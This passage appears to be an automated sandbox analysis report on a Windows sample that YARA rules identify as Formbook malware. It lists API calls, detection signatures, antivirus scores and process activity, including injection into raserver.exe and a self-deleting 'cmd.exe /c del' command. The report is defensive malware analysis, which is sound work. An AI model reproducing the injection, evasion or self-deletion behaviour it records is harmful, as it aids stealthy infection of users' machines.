          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,1_2_00418390
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004181AA NtCreateFile,1_2_004181AA
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041825A NtReadFile,1_2_0041825A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004182DA NtClose,1_2_004182DA
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_009D98F0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9840 NtDelayExecution,LdrInitializeThunk,1_2_009D9840
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_009D9860
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D99A0 NtCreateSection,LdrInitializeThunk,1_2_009D99A0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_009D9910
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_009D9A00
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9A20 NtResumeThread,LdrInitializeThunk,1_2_009D9A20
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9A50 NtCreateFile,LdrInitializeThunk,1_2_009D9A50
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D95D0 NtClose,LdrInitializeThunk,1_2_009D95D0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9540 NtReadFile,LdrInitializeThunk,1_2_009D9540
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_009D96E0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_009D9660
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9780 NtMapViewOfSection,LdrInitializeThunk,1_2_009D9780
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_009D97A0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9FE0 NtCreateMutant,LdrInitializeThunk,1_2_009D9FE0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9710 NtQueryInformationToken,LdrInitializeThunk,1_2_009D9710
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D98A0 NtWriteVirtualMemory,1_2_009D98A0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9820 NtEnumerateKey,1_2_009D9820
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009DB040 NtSuspendThread,1_2_009DB040
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D99D0 NtCreateProcessEx,1_2_009D99D0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9950 NtQueueApcThread,1_2_009D9950
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9A80 NtOpenDirectoryObject,1_2_009D9A80
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9A10 NtQuerySection,1_2_009D9A10
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009DA3B0 NtGetContextThread,1_2_009DA3B0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9B00 NtSetValueKey,1_2_009D9B00
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D95F0 NtQueryInformationFile,1_2_009D95F0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009DAD30 NtSetContextThread,1_2_009DAD30
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9520 NtWaitForSingleObject,1_2_009D9520
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9560 NtWriteFile,1_2_009D9560
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D96D0 NtCreateKey,1_2_009D96D0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9610 NtEnumerateValueKey,1_2_009D9610
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9650 NtQueryValueKey,1_2_009D9650
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9670 NtQueryInformationProcess,1_2_009D9670
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009DA710 NtOpenProcessToken,1_2_009DA710
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9730 NtQueryVirtualMemory,1_2_009D9730
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9770 NtSetInformationFile,1_2_009D9770
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009DA770 NtOpenThread,1_2_009DA770
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9760 NtOpenProcess,1_2_009D9760
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_004181B0 NtCreateFile,1_1_004181B0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00418260 NtReadFile,1_1_00418260
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_004182E0 NtClose,1_1_004182E0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00418390 NtAllocateVirtualMemory,1_1_00418390
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_004181AA NtCreateFile,1_1_004181AA
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_0041825A NtReadFile,1_1_0041825A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_004182DA NtClose,1_1_004182DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk,9_2_04B09860
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09840 NtDelayExecution,LdrInitializeThunk,9_2_04B09840
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B099A0 NtCreateSection,LdrInitializeThunk,9_2_04B099A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B095D0 NtClose,LdrInitializeThunk,9_2_04B095D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_04B09910
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09540 NtReadFile,LdrInitializeThunk,9_2_04B09540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04B096E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B096D0 NtCreateKey,LdrInitializeThunk,9_2_04B096D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04B09660
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09650 NtQueryValueKey,LdrInitializeThunk,9_2_04B09650
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09A50 NtCreateFile,LdrInitializeThunk,9_2_04B09A50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,9_2_04B09780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,9_2_04B09FE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,9_2_04B09710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B098A0 NtWriteVirtualMemory,9_2_04B098A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B098F0 NtReadVirtualMemory,9_2_04B098F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09820 NtEnumerateKey,9_2_04B09820
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0B040 NtSuspendThread,9_2_04B0B040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B095F0 NtQueryInformationFile,9_2_04B095F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B099D0 NtCreateProcessEx,9_2_04B099D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0AD30 NtSetContextThread,9_2_04B0AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09520 NtWaitForSingleObject,9_2_04B09520
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09560 NtWriteFile,9_2_04B09560
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09950 NtQueueApcThread,9_2_04B09950
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09A80 NtOpenDirectoryObject,9_2_04B09A80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09A20 NtResumeThread,9_2_04B09A20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09610 NtEnumerateValueKey,9_2_04B09610
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09A10 NtQuerySection,9_2_04B09A10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09A00 NtProtectVirtualMemory,9_2_04B09A00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09670 NtQueryInformationProcess,9_2_04B09670
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0A3B0 NtGetContextThread,9_2_04B0A3B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B097A0 NtUnmapViewOfSection,9_2_04B097A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09730 NtQueryVirtualMemory,9_2_04B09730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0A710 NtOpenProcessToken,9_2_04B0A710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09B00 NtSetValueKey,9_2_04B09B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09770 NtSetInformationFile,9_2_04B09770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0A770 NtOpenThread,9_2_04B0A770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09760 NtOpenProcess,9_2_04B09760
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B081B0 NtCreateFile,9_2_00B081B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B082E0 NtClose,9_2_00B082E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B08260 NtReadFile,9_2_00B08260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B08390 NtAllocateVirtualMemory,9_2_00B08390
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B081AA NtCreateFile,9_2_00B081AA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B082DA NtClose,9_2_00B082DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0825A NtReadFile,9_2_00B0825A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Code function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403486
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll 41B9F5241987338FAA262090BEAB1ADF4A9821497011BBE87D3A770F2C926666
          Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 04ACB150 appears 32 times
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Code function: String function: 0041A090 appears 40 times
          Source: lpdKSOB78u.exe, 00000000.00000003.204440401.0000000002D0F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs lpdKSOB78u.exe
          Source: lpdKSOB78u.exe, 00000000.00000002.211643992.0000000000C30000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs lpdKSOB78u.exe
          Source: lpdKSOB78u.exe, 00000001.00000002.265933060.0000000000969000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameraserver.exej% vs lpdKSOB78u.exe
          Source: lpdKSOB78u.exe, 00000001.00000002.266056817.0000000000A8F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs lpdKSOB78u.exe
          Source: lpdKSOB78u.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@14/8
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403486
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404763
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_703C4243 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_703C4243
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile created: C:\Users\user\AppData\Local\Temp\nsx545.tmp
          Source: lpdKSOB78u.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: lpdKSOB78u.exeVirustotal: Detection: 44%
          Source: lpdKSOB78u.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile read: C:\Users\user\Desktop\lpdKSOB78u.exe
          Source: unknownProcess created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeProcess created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: lpdKSOB78u.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: lpdKSOB78u.exe, 00000000.00000003.205218390.0000000002BF0000.00000004.00000001.sdmp, lpdKSOB78u.exe, 00000001.00000002.266056817.0000000000A8F000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lpdKSOB78u.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_70481A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70481A98
          Source: h1luljvls0ea.dll.0.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_70482F60 push eax; ret 0_2_70482F8E
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00416147 push esi; iretd 1_2_0041614A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00416125 push ds; retf 1_2_0041612B
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004153DC push es; retf 1_2_004153E5
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041B3F2 push eax; ret 1_2_0041B3F8
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041B3FB push eax; ret 1_2_0041B462
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00415B8C push ebp; ret 1_2_00415BD2
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041B3A5 push eax; ret 1_2_0041B3F8
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041B45C push eax; ret 1_2_0041B462
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00414E12 push ebx; ret 1_2_00414E14
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00414FCB pushfd ; iretd 1_2_00414FCC
